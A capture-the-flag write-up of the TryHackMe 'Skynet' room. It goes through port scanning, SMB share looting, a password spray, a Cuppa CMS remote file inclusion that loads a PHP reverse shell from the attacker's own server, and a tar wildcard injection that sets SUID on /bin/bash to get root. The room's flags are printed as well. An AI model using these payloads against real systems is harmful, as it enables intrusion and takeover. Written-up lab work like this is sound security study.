#tryhackme #linux #easy
![[Pasted image 20250624224650.png]]
---
# Port Scanning - Nmap
As always I began with scanning all TCP ports with Nmap.
```bash
root@ip-10-10-49-42:~# sudo nmap -sS 10.10.180.210 -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:28 BST
Nmap scan report for 10.10.180.210
Host is up (0.00054s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
```
Once the initial scan finished, I ran a second scan with default scripts and version detection (`-sC -sV`), this time only against the open ports found.
```bash
root@ip-10-10-49-42:~# nmap -sC -sV $IP -p 22,80,110,139,143,445
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:30 BST
Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210)
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA SASL TOP RESP-CODES AUTH-RESP-CODE PIPELINING UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID more have post-login OK LOGINDISABLEDA0001 capabilities ENABLE listed SASL-IR IMAP4rev1 LOGIN-REFERRALS Pre-login LITERAL+ IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2025-06-24T19:31:10-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-06-25T00:31:10
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
```
Finally, I scanned the top 1,000 UDP ports.
```bash
root@ip-10-10-49-42:~# nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:32 BST
Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210)
Host is up (0.00027s latency).
Not shown: 993 open|filtered ports
PORT STATE SERVICE
137/udp open netbios-ns
686/udp closed hcp-wismar
959/udp closed unknown
27899/udp closed unknown
36384/udp closed unknown
42313/udp closed unknown
49178/udp closed unknown
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
```
# Footprinting
##### Port 80
![[Pasted image 20250624193618.png]]
```bash
root@ip-10-10-49-42:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.180.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://10.10.180.210/admin/]
/css (Status: 301) [Size: 312] [--> http://10.10.180.210/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.180.210/js/]
/config (Status: 301) [Size: 315] [--> http://10.10.180.210/config/]
/ai (Status: 301) [Size: 311] [--> http://10.10.180.210/ai/]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.180.210/squirrelmail/]
/server-status (Status: 403) [Size: 278]
Progress: 218275 / 218276 (100.00%)
===============================================================
Finished
===============================================================
```
![[Pasted image 20250624203459.png]]
##### Port 445
I was able to list shares with `smbclient`. The `anonymous` and `milesdyson` shares stood out to me.
```bash
root@ip-10-10-49-42:~# smbclient -N -L //$IP
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk      Skynet Anonymous Share
milesdyson      Disk      Miles Dyson Personal Share
IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
```
The `anonymous` share contained some files, and I downloaded them locally to investigate further.
```bash
root@ip-10-10-49-42:~# smbclient -N //$IP/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831508 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 05:42:16 2019
.. D 0 Thu Nov 26 16:04:00 2020
log2.txt N 0 Wed Sep 18 05:42:13 2019
log1.txt N 471 Wed Sep 18 05:41:59 2019
log3.txt N 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831508 blocks available
```
`attention.txt`
```bash
root@ip-10-10-49-42:~# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```
`log1.txt`
```bash
root@ip-10-10-49-42:~# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```
`log2.txt` and `log3.txt` are just empty files:
```bash
root@ip-10-10-49-42:~# cat log2.txt
root@ip-10-10-49-42:~# cat log3.txt
root@ip-10-10-49-42:~# ls -l log2.txt
-rw-r--r-- 1 root root 0 Jun 25 01:38 log2.txt
root@ip-10-10-49-42:~# ls -l log3.txt
-rw-r--r-- 1 root root 0 Jun 25 01:38 log3.txt
```
The `log1.txt` file contains what appears to be a list of passwords, all variations on "terminator", and `attention.txt` is signed by Miles Dyson. This suggests that I should spray that list against the SMB server to discover valid credentials. So I did.
```bash
root@ip-10-10-49-42:~# crackmapexec smb $IP -u 'skynet.local\miles' -p log1.txt
SMB 10.10.180.210 445 SKYNET [*] Windows 6.1 (name:SKYNET) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.180.210 445 SKYNET [+] skynet.local\miles:cyborg007haloterminator
```
I found a set of valid credentials but I still wasn't able to access the `milesdyson` SMB share. A caveat on that `[+]`: Samba hosts configured with `map to guest = bad user` accept any password for a username that does not exist and map the session to guest, so a crackmapexec hit for a user that still cannot open the protected share should be re-checked with a deliberately wrong password before it is trusted. I suddenly remembered the `/squirrelmail` path I had discovered earlier using gobuster. What if I tried the credentials there?
`miles:cyborg007haloterminator` didn't work. I tried his full name (`milesdyson`) as the username and it let me in!
![[Pasted image 20250624203903.png]]
![[Pasted image 20250624203915.png]]
Let's read each email one by one, starting with the first one. This is why the password found did not work.
![[Pasted image 20250624204100.png]]
The second email contains nothing but binary data. I'll make sure to convert it to text later.
![[Pasted image 20250624204207.png]]
And the last email in inbox.
![[Pasted image 20250624204457.png]]
I converted the binary data found in the second email, and the decoded text appears to be very similar to the contents of the last email.
![[Pasted image 20250624204740.png]]
The decoded string is Miles Dyson's new password:
```
)s{A&2Z=F^n_E.B`
```
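Decoding a body like that does not need a web converter. The following is an added example, not part of the original writeup: a small POSIX shell function that turns a string of space-separated 8-bit binary groups into text and rejects anything that is not a full byte. The sample input is constructed here (it spells "Skynet") and is not the real e-mail content.

```bash
#!/bin/sh
# Added example, not from the original writeup: decode a string of
# space-separated 8-bit binary groups (the format of the second e-mail)
# into text locally, instead of pasting it into an online converter.

bin2text() {                       # usage: bin2text "01010011 01101011 ..."
  out=""
  for group in $1; do              # word-split on whitespace, one byte per group
    case "$group" in
      [01][01][01][01][01][01][01][01]) ;;
      *) echo "bin2text: '$group' is not an 8-bit group" >&2; return 1 ;;
    esac
    # accumulate the byte value bit by bit (avoids the bash-only 2# syntax)
    val=0; rest=$group
    while [ -n "$rest" ]; do
      bit=${rest%"${rest#?}"}      # first character
      rest=${rest#?}               # drop it
      val=$(( val * 2 + bit ))
    done
    # %03o gives the octal escape that printf's format string understands;
    # caveat: a decoded newline (012) would be stripped by the $(...) below
    out="$out$(printf "\\$(printf '%03o' "$val")")"
  done
  printf '%s\n' "$out"
}

# Constructed sample, not the real e-mail body: spells "Skynet"
SAMPLE_BINARY="01010011 01101011 01111001 01101110 01100101 01110100"

bin2text "$SAMPLE_BINARY"        # prints: Skynet
```

Groups of the wrong width make the function fail loudly rather than silently producing a wrong password, which matters when the output goes straight into a login attempt.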
```bash
root@ip-10-10-49-42:~# smbclient //$IP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019
9204224 blocks of size 1024. 5810756 blocks available
smb: \>
```
I downloaded every file in the `milesdyson` share, including the `notes` directory:
```bash
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget notes
getting file \notes\3.01 Search.md of size 65601 as notes/3.01 Search.md (32030.2 KiloBytes/sec) (average 73885.3 KiloBytes/sec)
getting file \notes\4.01 Agent-Based Models.md of size 5683 as notes/4.01 Agent-Based Models.md (1849.9 KiloBytes/sec) (average 73533.4 KiloBytes/sec)
getting file \notes\2.08 In Practice.md of size 7949 as notes/2.08 In Practice.md (2587.5 KiloBytes/sec) (average 73188.4 KiloBytes/sec)
getting file \notes\0.00 Cover.md of size 3114 as notes/0.00 Cover.md (1520.4 KiloBytes/sec) (average 72956.8 KiloBytes/sec)
getting file \notes\1.02 Linear Algebra.md of size 70314 as notes/1.02 Linear Algebra.md (34331.3 KiloBytes/sec) (average 72832.4 KiloBytes/sec)
```
Then a file named `important.txt` in `notes` caught my eye.
```bash
root@ip-10-10-49-42:~/notes# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
I navigated to `10.10.180.210/45kra24zxs28v3yd` and found this page below.
![[Pasted image 20250624210146.png]]
I ran gobuster against that path and found `/administrator`.
```bash
root@ip-10-10-49-42:~/notes# gobuster dir -u http://$IP/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.180.210/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 339] [--> http://10.10.180.210/45kra24zxs28v3yd/administrator/]
Progress: 218275 / 218276 (100.00%)
===============================================================
Finished
===============================================================
root@ip-10-10-49-42:~/notes#
```
`/administrator` revealed the name of the CMS being used: `Cuppa`.
![[Pasted image 20250624211610.png]]
# Exploit
I searched for `cuppa` in searchsploit, and there was one known exploit for Cuppa CMS.
```bash
root@ip-10-10-50-98:~# searchsploit cuppa
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Rem | php/webapps/25971.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
```
The exploit `25971.txt` describes a file inclusion in `alerts/alertConfigField.php`: the `urlConfig` request parameter is used unchecked as the file name that gets included, so an attacker can include a remote PHP file (RFI, when `allow_url_include` is enabled) or read local files (LFI), which can lead to full server compromise.
```bash
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
```
To prepare the attack, I downloaded the well-known Pentest Monkey PHP reverse shell, which I'm going to use to receive the shell.
![[Pasted image 20250624215533.png]]
I'm going to host an HTTP server using Python to serve my reverse shell payload. The goal is to point the vulnerable parameter from the PoC at that payload, so that when the target includes it, the reverse shell connects back and I receive a shell on my listener.
```bash
root@ip-10-10-50-98:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
```bash
root@ip-10-10-50-98:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
```
This is the full URL I requested:
```bash
http://10.10.237.190/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.50.98:8000/php-reverse-shell.php
```
Upon navigating to that URL in the browser, I immediately saw the target fetch my reverse shell:
```bash
root@ip-10-10-50-98:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.237.190 - - [25/Jun/2025 04:02:28] "GET /php-reverse-shell.php HTTP/1.0" 200 -
```
Checking the Netcat listener, I saw that I had a reverse shell as expected:
```bash
root@ip-10-10-50-98:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.237.190 47674
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
22:02:27 up 37 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
Found `user.txt`!
```bash
$ cd milesdyson
$ ls
backups
mail
share
user.txt
$ cat user.txt
7ce5...
```
# Privilege Escalation
`cat /etc/crontab` reveals that `/home/milesdyson/backups/backup.sh` is scheduled to run as root every minute (`*/1 * * * * root ...`).
```bash
www-data@skynet:/home/milesdyson$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
```
Unfortunately we cannot modify the script itself, since it is owned by root and www-data has no write permission on it.
```bash
www-data@skynet:/home/milesdyson$ ls -l /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17 2019 /home/milesdyson/backups/backup.sh
```
What `backup.sh` does is create an archive of the web root every minute: it changes directory to `/var/www/html` and runs `tar cf` over `*`, writing the result to `/home/milesdyson/backups/backup.tgz`. Two details matter here: the `*` is unquoted, so the shell expands it into the directory's file names before tar ever sees them, and the process doing this runs as root.
```bash
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```
I was stuck here and I was not able to finish the PrivEsc on my own. So what comes after is what I've gathered from other people's write ups.
Apparently, there's a technique called **Wildcard Injection**, which takes advantage of the unquoted wildcard in the tar command: the shell expands `*` into the names of the files in `/var/www/html`, and GNU tar treats any argument that starts with `--` as an option, even when that argument came from a file name. Since www-data can create files in the web root, we get to choose those names.
In order to exploit this, we proceed as follows:
1. Create a script that sets the SUID bit on `/bin/bash`
```bash
echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh
```
2. Create two empty files whose names are tar options:
    1. `--checkpoint-action=exec=sh root_shell.sh`
    2. `--checkpoint=1`
```bash
touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh"
touch "/var/www/html/--checkpoint=1"
```
`--checkpoint-action=ACTION` and `--checkpoint=NUMBER` are two GNU `tar` options.
- `--checkpoint=NUMBER` triggers a checkpoint every NUMBER-th record read or written (`1` means at every record, so the action fires almost immediately).
- `--checkpoint-action=ACTION` runs ACTION at each checkpoint. In our case the action is `exec`.
- `exec=COMMAND` runs the specified command, here `sh root_shell.sh`, through `/bin/sh` in tar's working directory (`/var/www/html`), which is why the relative script path works.
Therefore, the next time the cron job runs, tar receives the two file names as options rather than as files to archive, executes `sh root_shell.sh` as root at the first checkpoint, and `/bin/bash` ends up with the SUID bit set.
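To see the mechanism without waiting on a root cron job, here is an added example that is not part of the original writeup or the room: it reproduces the injection in a temporary directory as an unprivileged user, with a planted script that drops a marker file in place of `chmod +s /bin/bash`, and runs the backup command twice, once exactly as `backup.sh` does and once with `--` terminating option parsing. It needs GNU tar (busybox tar has no `--checkpoint`); the file and directory names are this example's own.

```bash
#!/bin/sh
# Added example, not code from the original writeup or the room: reproduce
# the tar wildcard injection in a scratch directory as an unprivileged user.
# The planted "payload" only drops a marker file instead of chmod +s /bin/bash.
# Needs GNU tar (busybox tar has no --checkpoint).

plant_payload() {          # $1 = directory standing in for /var/www/html, $2 = marker path
  printf '#!/bin/sh\ntouch "%s"\n' "$2" > "$1/root_shell.sh"
  # Two empty files whose names GNU tar will read as options once * expands
  touch -- "$1/--checkpoint=1"
  touch -- "$1/--checkpoint-action=exec=sh root_shell.sh"
}

# Same shape as backup.sh: the unquoted * is expanded by the shell, so tar
# receives "--checkpoint=1" and "--checkpoint-action=..." as arguments.
vulnerable_backup() {      # $1 = web root, $2 = archive path
  ( cd "$1" && tar cf "$2" * )
}

# Hardened: "--" ends option parsing, so every expanded name is an operand.
hardened_backup() {        # $1 = web root, $2 = archive path
  ( cd "$1" && tar cf "$2" -- * )
}

# Plants the files, runs the given backup function, and returns 0 only if
# the planted command actually executed (the marker file appeared).
payload_executed() {       # $1 = vulnerable_backup | hardened_backup
  work=$(mktemp -d) || return 2
  mkdir "$work/html"
  plant_payload "$work/html" "$work/pwned"
  "$1" "$work/html" "$work/backup.tgz" >/dev/null 2>&1
  if [ -e "$work/pwned" ]; then rc=0; else rc=1; fi
  rm -rf "$work"
  return $rc
}

for fn in vulnerable_backup hardened_backup; do
  if payload_executed "$fn"; then
    echo "$fn: planted command executed"      # expected for vulnerable_backup
  else
    echo "$fn: planted command not executed"  # expected for hardened_backup
  fi
done
```

The fix for the real script is the same `--`, or better `tar cf /home/milesdyson/backups/backup.tgz -C /var/www/html .`, which never hands file names to the shell's glob at all. More fundamentally, a root cron job should not archive, or live in, a directory that a less-privileged user can write to.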
After the next cron run, `/bin/bash` is SUID root. Running it with `-p` matters: without that flag, bash drops the effective UID back to the real UID when the two differ. Got the `root.txt` flag:
```bash
www-data@skynet:/home/milesdyson/backups$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash
www-data@skynet:/home/milesdyson/backups$ /bin/bash -p
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3f0372db24753accc7179a282cd6a949
```